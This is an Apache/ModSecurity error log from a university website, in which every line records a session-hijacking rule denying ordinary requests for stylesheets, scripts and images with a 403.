[Mon Aug 28 08:25:18.816246 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOv3fsCo-f0AAJKjaKQAAAAG"]
[Mon Aug 28 08:25:18.816307 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv3fsCo-f0AAJXrItMAAAAP"]
[Mon Aug 28 08:25:18.822316 2023] [:error] [pid 38149] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv3fsCo-f0AAJUFNdwAAAAA"]
[Mon Aug 28 08:25:18.935355 2023] [:error] [pid 38386] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3fsCo-f0AAJXyN70AAAAM"]
[Mon Aug 28 08:25:19.499108 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3f8Co-f0AAJSr25oAAAAO"]
[Mon Aug 28 08:25:44.927067 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv3mMCo-f0AAJSxY7cAAAAH"]
[Mon Aug 28 08:25:44.952427 2023] [:error] [pid 38379] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3mMCo-f0AAJXrItQAAAAP"]
[Mon Aug 28 08:26:14.771719 2023] [:error] [pid 38065] [client 180.253.178.178] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3tsCo-f0AAJSxY7sAAAAH"]
[Mon Aug 28 08:26:15.468027 2023] [:error] [pid 38303] [client 180.253.178.178] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3t8Co-f0AAJWfZOoAAAAI"]
[Mon Aug 28 08:26:28.859300 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv3xMCo-f0AAJTinlQAAAAE"]
[Mon Aug 28 08:26:28.871233 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv3xMCo-f0AAJWfZOsAAAAI"]
[Mon Aug 28 08:26:28.910598 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv3xMCo-f0AAJTinlUAAAAE"]
[Mon Aug 28 08:26:28.911081 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv3xMCo-f0AAJSxY7wAAAAH"]
[Mon Aug 28 08:26:28.912927 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3xMCo-f0AAJUFNd8AAAAA"]
[Mon Aug 28 08:26:28.912950 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv3xMCo-f0AAJXyN8EAAAAM"]
[Mon Aug 28 08:26:28.946674 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv3xMCo-f0AAJTinlYAAAAE"]
[Mon Aug 28 08:26:28.946716 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv3xMCo-f0AAJWfZOwAAAAI"]
[Mon Aug 28 08:26:28.970412 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv3xMCo-f0AAJUFNeAAAAAA"]
[Mon Aug 28 08:26:28.981644 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3xMCo-f0AAJXyN8IAAAAM"]
[Mon Aug 28 08:26:28.989294 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv3xMCo-f0AAJSxY70AAAAH"]
[Mon Aug 28 08:26:28.996661 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv3xMCo-f0AAJWfZO0AAAAI"]
[Mon Aug 28 08:26:29.033222 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv3xcCo-f0AAJTinlcAAAAE"]
[Mon Aug 28 08:26:29.033580 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv3xcCo-f0AAJSxY74AAAAH"]
[Mon Aug 28 08:26:29.042978 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv3xcCo-f0AAJUFNeEAAAAA"]
[Mon Aug 28 08:26:29.045494 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv3xcCo-f0AAJWfZO4AAAAI"]
[Mon Aug 28 08:26:29.046450 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv3xcCo-f0AAJXyN8MAAAAM"]
[Mon Aug 28 08:26:29.048697 2023] [:error] [pid 37539] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv3xcCo-f0AAJKjaKgAAAAG"]
[Mon Aug 28 08:26:29.105648 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv3xcCo-f0AAJUFNeIAAAAA"]
[Mon Aug 28 08:26:29.106774 2023] [:error] [pid 38059] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv3xcCo-f0AAJSr25wAAAAO"]
[Mon Aug 28 08:26:29.123530 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv3xcCo-f0AAJSxY78AAAAH"]
[Mon Aug 28 08:26:29.124141 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv3xcCo-f0AAJTinlgAAAAE"]
[Mon Aug 28 08:26:29.129082 2023] [:error] [pid 37539] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv3xcCo-f0AAJKjaKkAAAAG"]
[Mon Aug 28 08:26:29.129509 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv3xcCo-f0AAJXyN8QAAAAM"]
[Mon Aug 28 08:26:29.162124 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv3xcCo-f0AAJWfZO8AAAAI"]
[Mon Aug 28 08:26:29.163445 2023] [:error] [pid 38059] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv3xcCo-f0AAJSr250AAAAO"]
[Mon Aug 28 08:26:29.217425 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3xcCo-f0AAJUFNeMAAAAA"]
[Mon Aug 28 08:26:29.304442 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3xcCo-f0AAJTinlkAAAAE"]
[Mon Aug 28 08:27:01.977557 2023] [:error] [pid 38059] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv35cCo-f0AAJSr254AAAAO"]
[Mon Aug 28 08:27:02.790720 2023] [:error] [pid 37539] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv35sCo-f0AAJKjaKsAAAAG"]
[Mon Aug 28 08:27:49.246466 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv4FcCo-f0AAJXyN8gAAAAM"]
[Mon Aug 28 08:27:49.249465 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv4FcCo-f0AAJX1kiQAAAAS"]
[Mon Aug 28 08:27:49.335642 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv4FcCo-f0AAJSr26EAAAAO"]
[Mon Aug 28 08:27:49.339307 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv4FcCo-f0AAJXrItgAAAAP"]
[Mon Aug 28 08:27:49.352015 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv4FcCo-f0AAJUFNecAAAAA"]
[Mon Aug 28 08:27:49.361398 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv4FcCo-f0AAJY@OnEAAAAB"]
[Mon Aug 28 08:27:49.362548 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv4FcCo-f0AAJX1kiUAAAAS"]
[Mon Aug 28 08:27:49.363594 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv4FcCo-f0AAJXyN8kAAAAM"]
[Mon Aug 28 08:27:49.479357 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv4FcCo-f0AAJSr26IAAAAO"]
[Mon Aug 28 08:27:49.480128 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv4FcCo-f0AAJY@OnIAAAAB"]
[Mon Aug 28 08:27:49.481259 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv4FcCo-f0AAJXrItkAAAAP"]
[Mon Aug 28 08:27:49.519110 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv4FcCo-f0AAJX1kiYAAAAS"]
[Mon Aug 28 08:27:49.535675 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv4FcCo-f0AAJUFNegAAAAA"]
[Mon Aug 28 08:27:49.544989 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv4FcCo-f0AAJXyN8oAAAAM"]
[Mon Aug 28 08:27:49.589343 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv4FcCo-f0AAJSr26MAAAAO"]
[Mon Aug 28 08:27:49.598309 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv4FcCo-f0AAJXrItoAAAAP"]
[Mon Aug 28 08:27:49.614867 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv4FcCo-f0AAJX1kicAAAAS"]
[Mon Aug 28 08:27:49.615024 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv4FcCo-f0AAJXyN8sAAAAM"]
[Mon Aug 28 08:27:49.618302 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv4FcCo-f0AAJY@OnMAAAAB"]
[Mon Aug 28 08:27:49.649605 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv4FcCo-f0AAJUFNekAAAAA"]
[Mon Aug 28 08:27:49.691555 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv4FcCo-f0AAJSr26QAAAAO"]
[Mon Aug 28 08:27:49.746274 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv4FcCo-f0AAJX1kigAAAAS"]
[Mon Aug 28 08:27:49.746618 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv4FcCo-f0AAJSr26UAAAAO"]
